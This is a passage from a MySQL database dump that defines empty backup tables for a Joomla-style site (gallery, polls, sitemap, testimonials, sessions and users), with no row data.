'0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `ordering` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocadownload_user_stat` -- LOCK TABLES `bak_fit_bss_phocadownload_user_stat` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_user_stat` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_user_stat` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery` ( `id` int(11) unsigned NOT NULL auto_increment, `catid` int(11) NOT NULL default '0', `sid` int(11) NOT NULL default '0', `title` varchar(250) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `filename` varchar(250) NOT NULL default '', `description` text, `date` datetime NOT NULL default '0000-00-00 00:00:00', `hits` int(11) NOT NULL default '0', `latitude` varchar(20) NOT NULL default '', `longitude` varchar(20) NOT NULL default '', `zoom` int(3) NOT NULL default '0', `geotitle` varchar(255) NOT NULL default '', `videocode` text, `vmproductid` int(11) NOT NULL default '0', `imgorigsize` int(11) NOT NULL default '0', `published` tinyint(1) NOT NULL default '0', `approved` tinyint(1) NOT NULL default '0', `checked_out` int(11) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text, `metakey` text, `metadesc` text, `extlink1` text, `extlink2` text, `extid` varchar(255) NOT NULL default '', `extl` varchar(255) NOT NULL default '', `extm` varchar(255) NOT NULL default '', `exts` varchar(255) NOT NULL default '', `exto` varchar(255) NOT NULL default '', `extw` varchar(255) NOT NULL default '', `exth` varchar(255) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery` -- LOCK TABLES `bak_fit_bss_phocagallery` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery_categories` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery_categories`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery_categories` ( `id` int(11) NOT NULL auto_increment, `parent_id` int(11) NOT NULL default '0', `owner_id` int(11) NOT NULL default '0', `title` varchar(255) NOT NULL default '', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `image` varchar(255) NOT NULL default '', `section` varchar(50) NOT NULL default '', `image_position` varchar(30) NOT NULL default '', `description` text, `date` datetime NOT NULL default '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `approved` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `editor` varchar(50) default NULL, `ordering` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `hits` int(11) NOT NULL default '0', `count` int(11) NOT NULL default '0', `accessuserid` text, `uploaduserid` text, `deleteuserid` text, `userfolder` text, `latitude` varchar(20) NOT NULL default '', `longitude` varchar(20) NOT NULL default '', `zoom` int(3) NOT NULL default '0', `geotitle` varchar(255) NOT NULL default '', `params` text, `metakey` text, `metadesc` text, `extid` varchar(255) NOT NULL default '', `exta` varchar(255) NOT NULL default '', `extu` varchar(255) NOT NULL default '', `extauth` varchar(255) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery_categories` -- LOCK TABLES `bak_fit_bss_phocagallery_categories` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_categories` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery_comments` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery_comments`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery_comments` ( `id` int(11) NOT NULL auto_increment, `catid` int(11) NOT NULL default '0', `userid` int(11) NOT NULL default '0', `date` datetime NOT NULL default '0000-00-00 00:00:00', `title` varchar(255) NOT NULL default '', `comment` text, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery_comments` -- LOCK TABLES `bak_fit_bss_phocagallery_comments` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_comments` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery_img_comments` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery_img_comments`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery_img_comments` ( `id` int(11) NOT NULL auto_increment, `imgid` int(11) NOT NULL default '0', `userid` int(11) NOT NULL default '0', `date` datetime NOT NULL default '0000-00-00 00:00:00', `title` varchar(255) NOT NULL default '', `comment` text, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery_img_comments` -- LOCK TABLES `bak_fit_bss_phocagallery_img_comments` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_img_comments` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_img_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery_img_votes` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery_img_votes`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery_img_votes` ( `id` int(11) NOT NULL auto_increment, `imgid` int(11) NOT NULL default '0', `userid` int(11) NOT NULL default '0', `date` datetime NOT NULL default '0000-00-00 00:00:00', `rating` tinyint(1) NOT NULL default '0', `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery_img_votes` -- LOCK TABLES `bak_fit_bss_phocagallery_img_votes` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_img_votes` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_img_votes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery_img_votes_statistics` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery_img_votes_statistics`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery_img_votes_statistics` ( `id` int(11) NOT NULL auto_increment, `imgid` int(11) NOT NULL default '0', `count` int(11) NOT NULL default '0', `average` float(8,6) NOT NULL default '0.000000', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery_img_votes_statistics` -- LOCK TABLES `bak_fit_bss_phocagallery_img_votes_statistics` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_img_votes_statistics` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_img_votes_statistics` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery_user` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery_user`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery_user` ( `id` int(11) NOT NULL auto_increment, `userid` int(11) NOT NULL default '0', `avatar` varchar(40) NOT NULL default '', `published` tinyint(1) NOT NULL default '0', `approved` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery_user` -- LOCK TABLES `bak_fit_bss_phocagallery_user` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_user` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_user` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery_votes` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery_votes`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery_votes` ( `id` int(11) NOT NULL auto_increment, `catid` int(11) NOT NULL default '0', `userid` int(11) NOT NULL default '0', `date` datetime NOT NULL default '0000-00-00 00:00:00', `rating` tinyint(1) NOT NULL default '0', `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery_votes` -- LOCK TABLES `bak_fit_bss_phocagallery_votes` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_votes` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_votes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocagallery_votes_statistics` -- DROP TABLE IF EXISTS `bak_fit_bss_phocagallery_votes_statistics`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocagallery_votes_statistics` ( `id` int(11) NOT NULL auto_increment, `catid` int(11) NOT NULL default '0', `count` int(11) NOT NULL default '0', `average` float(8,6) NOT NULL default '0.000000', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocagallery_votes_statistics` -- LOCK TABLES `bak_fit_bss_phocagallery_votes_statistics` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_votes_statistics` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocagallery_votes_statistics` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_plugins` -- DROP TABLE IF EXISTS `bak_fit_bss_plugins`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_plugins` ( `id` int(11) NOT NULL auto_increment, `name` varchar(100) NOT NULL default '', `element` varchar(100) NOT NULL default '', `folder` varchar(100) NOT NULL default '', `access` tinyint(3) unsigned NOT NULL default '0', `ordering` int(11) NOT NULL default '0', `published` tinyint(3) NOT NULL default '0', `iscore` tinyint(3) NOT NULL default '0', `client_id` tinyint(3) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=78 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_plugins` -- LOCK TABLES `bak_fit_bss_plugins` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_plugins` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_plugins` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_poll_data` -- DROP TABLE IF EXISTS `bak_fit_bss_poll_data`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_poll_data` ( `id` int(11) NOT NULL auto_increment, `pollid` int(11) NOT NULL default '0', `text` text NOT NULL, `hits` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_poll_data` -- LOCK TABLES `bak_fit_bss_poll_data` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_poll_data` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_poll_data` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_poll_date` -- DROP TABLE IF EXISTS `bak_fit_bss_poll_date`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_poll_date` ( `id` bigint(20) NOT NULL auto_increment, `date` datetime NOT NULL default '0000-00-00 00:00:00', `vote_id` int(11) NOT NULL default '0', `poll_id` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_poll_date` -- LOCK TABLES `bak_fit_bss_poll_date` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_poll_date` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_poll_date` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_poll_menu` -- DROP TABLE IF EXISTS `bak_fit_bss_poll_menu`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_poll_menu` ( `pollid` int(11) NOT NULL default '0', `menuid` int(11) NOT NULL default '0', PRIMARY KEY (`pollid`,`menuid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_poll_menu` -- LOCK TABLES `bak_fit_bss_poll_menu` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_poll_menu` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_poll_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_polls` -- DROP TABLE IF EXISTS `bak_fit_bss_polls`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_polls` ( `id` int(11) unsigned NOT NULL auto_increment, `title` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `voters` int(9) NOT NULL default '0', `checked_out` int(11) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `access` int(11) NOT NULL default '0', `lag` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_polls` -- LOCK TABLES `bak_fit_bss_polls` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_polls` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_polls` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_rd_sitemap_rel_viewset_has_view` -- DROP TABLE IF EXISTS `bak_fit_bss_rd_sitemap_rel_viewset_has_view`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_rd_sitemap_rel_viewset_has_view` ( `id` int(11) unsigned NOT NULL auto_increment, `viewset` int(11) unsigned NOT NULL default '0', `view` int(11) unsigned NOT NULL default '0', `ordering` int(11) unsigned NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_rd_sitemap_rel_viewset_has_view` -- LOCK TABLES `bak_fit_bss_rd_sitemap_rel_viewset_has_view` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_rd_sitemap_rel_viewset_has_view` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_rd_sitemap_rel_viewset_has_view` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_rd_sitemap_view` -- DROP TABLE IF EXISTS `bak_fit_bss_rd_sitemap_view`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_rd_sitemap_view` ( `id` int(11) unsigned NOT NULL auto_increment, `type` varchar(100) NOT NULL default '', `title` text NOT NULL, `creation_date` varchar(255) NOT NULL default '', `author` varchar(255) NOT NULL default '', `copyright` varchar(255) NOT NULL default '', `author_email` varchar(255) NOT NULL default '', `author_url` varchar(255) NOT NULL default '', `version` varchar(255) NOT NULL default '', `description` text NOT NULL, `content` text NOT NULL, `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `params` text NOT NULL, `control` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_rd_sitemap_view` -- LOCK TABLES `bak_fit_bss_rd_sitemap_view` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_rd_sitemap_view` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_rd_sitemap_view` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_rd_sitemap_viewset` -- DROP TABLE IF EXISTS `bak_fit_bss_rd_sitemap_viewset`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_rd_sitemap_viewset` ( `id` int(11) unsigned NOT NULL auto_increment, `title` text NOT NULL, `content` text NOT NULL, `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_rd_sitemap_viewset` -- LOCK TABLES `bak_fit_bss_rd_sitemap_viewset` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_rd_sitemap_viewset` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_rd_sitemap_viewset` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_rdbs_comment` -- DROP TABLE IF EXISTS `bak_fit_bss_rdbs_comment`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_rdbs_comment` ( `id` int(11) unsigned NOT NULL auto_increment, `type` varchar(100) NOT NULL default '', `description` text NOT NULL, `content` text NOT NULL, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `params` text NOT NULL, `control` text NOT NULL, `sizex` varchar(250) NOT NULL default '500', `sizey` varchar(250) NOT NULL default '400', `image` varchar(250) NOT NULL default 'config', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_rdbs_comment` -- LOCK TABLES `bak_fit_bss_rdbs_comment` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_rdbs_comment` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_rdbs_comment` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_regulations` -- DROP TABLE IF EXISTS `bak_fit_bss_regulations`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_regulations` ( `id` int(10) unsigned NOT NULL auto_increment, `CountryID` int(10) unsigned NOT NULL default '0', `Text_A` text NOT NULL, `Text_E` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=cp1256 COMMENT='InnoDB free: 13312 kB; (`CountryID`) REFER ```jepafv/countri'; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_regulations` -- LOCK TABLES `bak_fit_bss_regulations` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_regulations` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_regulations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_regulations_old` -- DROP TABLE IF EXISTS `bak_fit_bss_regulations_old`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_regulations_old` ( `id` int(10) unsigned NOT NULL auto_increment, `CountryID` int(10) unsigned NOT NULL default '0', `Text_A` text NOT NULL, `Text_E` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=cp1256 COMMENT='InnoDB free: 13312 kB; (`CountryID`) REFER `````jepafv/count'; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_regulations_old` -- LOCK TABLES `bak_fit_bss_regulations_old` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_regulations_old` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_regulations_old` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_rsmonials` -- DROP TABLE IF EXISTS `bak_fit_bss_rsmonials`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_rsmonials` ( `id` int(11) NOT NULL auto_increment, `fname` varchar(50) NOT NULL default '', `lname` varchar(50) NOT NULL default '', `about` text NOT NULL, `location` varchar(255) NOT NULL default '', `website` varchar(255) NOT NULL default '', `email` varchar(100) NOT NULL default '', `comment` text NOT NULL, `date` date NOT NULL default '0000-00-00', `status` int(1) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_rsmonials` -- LOCK TABLES `bak_fit_bss_rsmonials` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_rsmonials` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_rsmonials` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_rsmonials_param` -- DROP TABLE IF EXISTS `bak_fit_bss_rsmonials_param`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_rsmonials_param` ( `id` int(11) NOT NULL auto_increment, `param_name` varchar(100) NOT NULL default '', `param_description` text NOT NULL, `param_value` text NOT NULL, `ordering` int(3) NOT NULL default '100', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=23 DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_rsmonials_param` -- LOCK TABLES `bak_fit_bss_rsmonials_param` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_rsmonials_param` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_rsmonials_param` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_rsmonials_param_style` -- DROP TABLE IF EXISTS `bak_fit_bss_rsmonials_param_style`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_rsmonials_param_style` ( `id` int(11) NOT NULL auto_increment, `param_name` varchar(100) NOT NULL default '', `param_description` text NOT NULL, `param_value` text NOT NULL, `ordering` int(3) NOT NULL default '100', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_rsmonials_param_style` -- LOCK TABLES `bak_fit_bss_rsmonials_param_style` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_rsmonials_param_style` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_rsmonials_param_style` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_sections` -- DROP TABLE IF EXISTS `bak_fit_bss_sections`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_sections` ( `id` int(11) NOT NULL auto_increment, `title` varchar(255) NOT NULL default '', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `image` text NOT NULL, `scope` varchar(50) NOT NULL default '', `image_position` varchar(30) NOT NULL default '', `description` text NOT NULL, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `count` int(11) NOT NULL default '0', `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_sections` -- LOCK TABLES `bak_fit_bss_sections` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_sections` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_sections` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_session` -- DROP TABLE IF EXISTS `bak_fit_bss_session`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_session` ( `username` varchar(150) default '', `time` varchar(14) default '', `session_id` varchar(200) NOT NULL default '0', `guest` tinyint(4) default '1', `userid` int(11) default '0', `usertype` varchar(50) default '', `gid` tinyint(3) unsigned NOT NULL default '0', `client_id` tinyint(3) unsigned NOT NULL default '0', `data` longtext, PRIMARY KEY (`session_id`(64)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_session` -- LOCK TABLES `bak_fit_bss_session` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_session` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_session` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_stats_agents` -- DROP TABLE IF EXISTS `bak_fit_bss_stats_agents`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_stats_agents` ( `agent` varchar(255) NOT NULL default '', `type` tinyint(1) unsigned NOT NULL default '0', `hits` int(11) unsigned NOT NULL default '1' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_stats_agents` -- LOCK TABLES `bak_fit_bss_stats_agents` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_stats_agents` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_stats_agents` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_templates_menu` -- DROP TABLE IF EXISTS `bak_fit_bss_templates_menu`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_templates_menu` ( `template` varchar(255) NOT NULL default '', `menuid` int(11) NOT NULL default '0', `client_id` tinyint(4) NOT NULL default '0', PRIMARY KEY (`menuid`,`client_id`,`template`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_templates_menu` -- LOCK TABLES `bak_fit_bss_templates_menu` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_templates_menu` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_templates_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_test` -- DROP TABLE IF EXISTS `bak_fit_bss_test`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_test` ( `f1` int(11) NOT NULL default '0', `f2` varchar(255) default '', `f3` varchar(255) default NULL, `f4` varchar(255) default NULL, PRIMARY KEY (`f1`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_test` -- LOCK TABLES `bak_fit_bss_test` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_test` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_test` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_users` -- DROP TABLE IF EXISTS `bak_fit_bss_users`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_users` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL 